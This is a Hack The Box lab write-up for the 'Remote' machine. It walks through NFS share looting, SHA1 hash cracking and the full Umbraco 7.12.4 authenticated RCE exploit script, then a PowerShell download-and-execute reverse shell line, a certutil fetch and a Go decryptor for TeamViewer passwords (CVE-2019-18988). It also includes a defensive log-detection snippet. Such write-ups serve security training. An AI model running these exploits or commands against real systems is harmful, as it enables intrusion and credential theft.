Remote - Hack The Box

Remote is a vulnerable Windows machine that features an Umbraco CMS installation. Credentials are found in a misconfigured NFS share.

With these credentials, an authenticated Umbraco CMS exploit is leveraged to gain a foothold. A vulnerable TeamViewer version is identified, from which we can gain a password to continue further testing.

https://app.hackthebox.com/machines/234/information

Enumeration

Target IP: 10.129.230.172 Attacker IP: 10.10.14.92

nmap -sCVS 10.129.230.172

21/tcp   open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
2049/tcp open  nlockmgr      1-4 (RPC #100021)
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-07-08T10:16:04
|_  start_date: N/A
|_clock-skew: 59m59s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

We head over to the web page at: http://10.129.230.172

It looks like a standard portfolio / store.

Umbraco keeps popping up on the site. Umbraco is a free and open-source .NET-based content management system (CMS) used for building and managing websites.

We find a login page at http://10.129.230.172/umbraco

We have no credentials for this page, so let's do some more digging.

NFS Share

Let's see if the NFS share has any important intel.

showmount -e 10.129.230.172

We find a mount that is accessible globally, /site_backups. We can go ahead and mount it and view the contents.

sudo mount -t nfs 10.129.230.172:/site_backups /mnt/

There are a ton of folders we can search through. Some quick google-fu on Umbraco documentation and its database location gives us a better idea of what lower-hanging fruit we can pick first.

We head over to the App_Data folder and find Umbraco.sdf. We run strings on the database file to see if we can easily find some credentials.

strings Umbraco.sdf | grep 'admin'

We find a SHA1 hash that we can likely crack.

SHA1 & Hashcat

[email protected]:b8be16afba8c314ad33d812f22a04991b90e2aaa

We run hashcat on this hash in mode 100, which is raw (unsalted) SHA1.

hashcat -m 100 hash ~/Downloads/rockyou.txt

We find a secure password

[email protected]:baconandcheese

We try these credentials to log into the CMS and are able to do so!

Umbraco 7.12.4 RCE

With some further enumeration on the site we are able to obtain a version number.

We find that this version is likely vulnerable to an authenticated RCE attack.

https://www.exploit-db.com/exploits/49488

# Exploit Title: Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated) 
# Date: 2020-03-28
# Exploit Author: Alexandre ZANNI (noraj)
# Based on: https://www.exploit-db.com/exploits/46153
# Vendor Homepage: http://www.umbraco.com/
# Software Link: https://our.umbraco.com/download/releases
# Version: 7.12.4
# Category: Webapps
# Tested on: Windows IIS
# Example: python exploit.py -u [email protected] -p password123 -i 'http://10.0.0.1' -c ipconfig

import requests
import re
import argparse

from bs4 import BeautifulSoup

parser = argparse.ArgumentParser(prog='exploit.py',
    description='Umbraco authenticated RCE',
    formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=80))
parser.add_argument('-u', '--user', metavar='USER', type=str,
    required=True, dest='user', help='username / email')
parser.add_argument('-p', '--password', metavar='PASS', type=str,
    required=True, dest='password', help='password')
parser.add_argument('-i', '--host', metavar='URL', type=str, required=True,
    dest='url', help='root URL')
parser.add_argument('-c', '--command', metavar='CMD', type=str, required=True,
    dest='command', help='command')
parser.add_argument('-a', '--arguments', metavar='ARGS', type=str, required=False,
    dest='arguments', help='arguments', default='')
args = parser.parse_args()

# Payload
payload = """\
<?xml version="1.0"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:csharp_user="http://csharp.mycompany.com/mynamespace"><msxsl:script language="C#" implements-prefix="csharp_user">public string xml() { string cmd = "%s"; System.Diagnostics.Process proc = new System.Diagnostics.Process(); proc.StartInfo.FileName = "%s"; proc.StartInfo.Arguments = cmd; proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true;  proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; }  </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/> </xsl:template> </xsl:stylesheet>\
""" % (args.arguments, args.command)

login = args.user
password = args.password
host = args.url

# Process Login
url_login = host + "/umbraco/backoffice/UmbracoApi/Authentication/PostLogin"
loginfo = { "username": login, "password": password}
s = requests.session()
r2 = s.post(url_login,json=loginfo)

# Go to vulnerable web page
url_xslt = host + "/umbraco/developer/Xslt/xsltVisualize.aspx"
r3 = s.get(url_xslt)

soup = BeautifulSoup(r3.text, 'html.parser')
VIEWSTATE = soup.find(id="__VIEWSTATE")['value']
VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value']
UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN']
headers = {'UMB-XSRF-TOKEN': UMBXSRFTOKEN}
data = { "__EVENTTARGET": "", "__EVENTARGUMENT": "", "__VIEWSTATE": VIEWSTATE,
    "__VIEWSTATEGENERATOR": VIEWSTATEGENERATOR,
    "ctl00$body$xsltSelection": payload,
    "ctl00$body$contentPicker$ContentIdValue": "",
    "ctl00$body$visualizeDo": "Visualize+XSLT" }

# Launch the attack
r4 = s.post(url_xslt, data=data, headers=headers)
# Filter output
soup = BeautifulSoup(r4.text, 'html.parser')
CMDOUTPUT = soup.find(id="result").getText()
print(CMDOUTPUT)

We try the script; it runs and gives us output.

python 49488.py -u [email protected] -p baconandcheese -i http://10.129.230.172 -c whoami

It looks like this script is abusing the vulnerable web page at /umbraco/developer/Xslt/xsltVisualize.aspx.

The page lets a back-office user preview an XSLT transform. XSLT is a language for converting XML documents into other formats, which is why the payload is itself an XML document; here the stylesheet embeds C# through the msxsl:script extension, and that embedded code is what runs our command.

<?xml version="1.0"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:csharp_user="http://csharp.mycompany.com/mynamespace"><msxsl:script language="C#" implements-prefix="csharp_user">public string xml() { string cmd = "%s"; System.Diagnostics.Process proc = new System.Diagnostics.Process(); proc.StartInfo.FileName = "%s"; proc.StartInfo.Arguments = cmd; proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true;  proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; }  </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/> </xsl:template> </xsl:stylesheet>\
""" % (args.arguments, args.command)
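
From the defender's side, the sequence the script produces is visible in the IIS logs: a POST to the PostLogin API followed by a POST to xsltVisualize.aspx from the same client. The Go program below is added here as an example (it is not part of the original post or of the exploit): it parses a constructed W3C-format log excerpt and flags every POST to the visualizer, on the assumption that legitimate back-office users rarely submit stylesheets there, so each hit deserves a look.

```go
package main

import (
	"fmt"
	"strings"
)

// Constructed IIS W3C log excerpt (not from the target). It mirrors the request sequence the
// 49488.py script above produces: PostLogin, then a GET and a POST to xsltVisualize.aspx.
const sampleLog = `#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2025-07-08 10:20:05 10.129.230.172 POST /umbraco/backoffice/UmbracoApi/Authentication/PostLogin - 80 - 10.10.14.92 python-requests/2.31.0 - 200 0 0 120
2025-07-08 10:20:06 10.129.230.172 GET /umbraco/developer/Xslt/xsltVisualize.aspx - 80 - 10.10.14.92 python-requests/2.31.0 - 200 0 0 30
2025-07-08 10:20:06 10.129.230.172 POST /umbraco/developer/Xslt/xsltVisualize.aspx - 80 - 10.10.14.92 python-requests/2.31.0 - 200 0 0 410
2025-07-08 10:25:00 10.129.230.172 GET /products/ - 80 - 10.10.14.50 Mozilla/5.0 - 200 0 0 12`
const xsltVisualizer = "/umbraco/developer/xslt/xsltvisualize.aspx" // paths compared lower-cased: IIS is case-insensitive
const postLogin = "/umbraco/backoffice/umbracoapi/authentication/postlogin"

// Alert is one POST to the XSLT visualizer, the request that carries the msxsl:script payload.
type Alert struct {
	Time, ClientIP, UserAgent string
	LoggedInViaAPI            bool // same client POSTed to PostLogin earlier in the log
}

// findXsltVisualizerPosts parses W3C lines via their #Fields header and flags every POST to xsltVisualize.aspx.
func findXsltVisualizerPosts(log string) []Alert {
	idx, loggedIn := map[string]int{}, map[string]bool{}
	var alerts []Alert
	for _, line := range strings.Split(log, "\n") {
		if strings.HasPrefix(line, "#Fields:") {
			idx = map[string]int{}
			for i, name := range strings.Fields(line)[1:] {
				idx[name] = i
			}
			continue
		}
		f := strings.Fields(line)
		if strings.HasPrefix(line, "#") || len(idx) == 0 || len(f) < len(idx) {
			continue // other directive, no header yet, or truncated record
		}
		method, stem, ip := f[idx["cs-method"]], strings.ToLower(f[idx["cs-uri-stem"]]), f[idx["c-ip"]]
		if method == "POST" && stem == postLogin {
			loggedIn[ip] = true
		}
		if method == "POST" && stem == xsltVisualizer {
			alerts = append(alerts, Alert{f[idx["date"]] + " " + f[idx["time"]], ip, f[idx["cs(User-Agent)"]], loggedIn[ip]})
		}
	}
	return alerts
}
func main() { fmt.Printf("%+v\n", findXsltVisualizerPosts(sampleLog)) }
```

The GET to the same page is deliberately not flagged: only the POST carries the stylesheet, and the prior PostLogin from the same address tells you the request came through a valid back-office session rather than from an unauthenticated probe.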

With the script, we will try to establish a reverse shell with our target.

I first create a .ps1 script. I use this great website: https://www.revshells.com/

(I would keep this website bookmarked; it has helped me many times when needing to quickly establish a shell.) I create a PowerShell reverse shell script which is encoded in base64.

We start a simple Python HTTP server in the directory where our PowerShell reverse shell script is saved.

python -m http.server 80

We are then able to use the RCE exploit to grab the file from our HTTP server, and then to execute it.

python 49488.py -u [email protected] -p baconandcheese -i http://10.129.230.172 -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.92/revshell.ps1')"

python 49488.py -u [email protected] -p baconandcheese -i http://10.129.230.172 -c powershell.exe -a ".\revshell.ps1"

We are in!

Privilege Escalation - TeamViewer

While grabbing our first flag we found an interesting link on the Public desktop.

We see TeamViewer. A lot of the older versions are vulnerable to local credential disclosure exploits, and this may be one of them.

It looks like CVE-2019-18988 may be our way in. I found an exploit script here: https://github.com/mr-r3b00t/CVE-2019-18988/blob/master/manual_exploit.bat

This script simply parses the information we need out of the registry, and it also provides a recipe we can use with CyberChef to decrypt the AES string. You can find the tool here: https://gchq.github.io/CyberChef/

We transfer it from our HTTP server to the target machine.

certutil.exe -urlcache -split -f http://10.10.14.92/manual_exploit.bat C:/Users/Public/manual_exploit.bat

We run the batch and see what we get!

.\manual_exploit.bat

From the script output we get a CyberChef recipe we can use:

AES_Decrypt({'option':'Hex','string':'0602000000a400005253413100040000'},{'option':'Hex','string':'0100010067244F436E6762F25EA8D704'},'CBC','Hex','Raw',{'option':'Hex','string':''})Decode_text('UTF-16LE (1200)')

This simply fills in the parameters we need for a valid result: the AES key and IV, CBC mode, hex input, and a final UTF-16LE decode of the output.

We can also take the SecurityPasswordAES field that was extracted from the registry and use it as our input.

SecurityPasswordAES REG_BINARY FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B

We get a password: !R3m0te!
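
The same recipe as Go code, added here as a worked example (not part of the original post or of the manual_exploit.bat script): it runs AES-128-CBC with the key and IV from the recipe over the SecurityPasswordAES bytes and decodes the UTF-16LE result. The key and IV are fixed values, so anyone able to read that registry value can recover the password; that is the weakness CVE-2019-18988 describes.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/hex"
	"fmt"
	"unicode/utf16"
)

// Static AES-128 key/IV from the CyberChef recipe (the CVE-2019-18988 constants) and the
// SecurityPasswordAES REG_BINARY value read from the target's registry (all from the page).
const (
	tvKeyHex               = "0602000000a400005253413100040000"
	tvIVHex                = "0100010067244F436E6762F25EA8D704"
	securityPasswordAESHex = "FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B"
)

// decryptTeamViewerPassword mirrors the recipe: AES-CBC decrypt with the static key/IV,
// drop PKCS#7 padding if present, then decode the UTF-16LE string up to its NUL terminator.
func decryptTeamViewerPassword(ctHex string) (string, error) {
	key, _ := hex.DecodeString(tvKeyHex) // constants above, known to be valid hex
	iv, _ := hex.DecodeString(tvIVHex)
	ct, err := hex.DecodeString(ctHex)
	if err != nil || len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return "", fmt.Errorf("ciphertext must be hex and a whole number of AES blocks (%v)", err)
	}
	block, _ := aes.NewCipher(key) // 16-byte key, cannot fail
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	if n := int(pt[len(pt)-1]); n >= 1 && n <= aes.BlockSize && bytes.Count(pt[len(pt)-n:], []byte{byte(n)}) == n {
		pt = pt[:len(pt)-n] // well-formed PKCS#7 padding
	}
	var units []uint16 // UTF-16LE code units up to the terminating NUL
	for i := 0; i+1 < len(pt); i += 2 {
		u := uint16(pt[i]) | uint16(pt[i+1])<<8
		if u == 0 {
			break
		}
		units = append(units, u)
	}
	return string(utf16.Decode(units)), nil
}

func main() {
	pw, err := decryptTeamViewerPassword(securityPasswordAESHex)
	fmt.Println("recovered TeamViewer password:", pw, "error:", err)
}
```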

Let's see if this works with the Administrator account.

impacket-psexec 'administrator:!R3m0te!@10.129.230.172'

We have system access! pwned

pwnand.win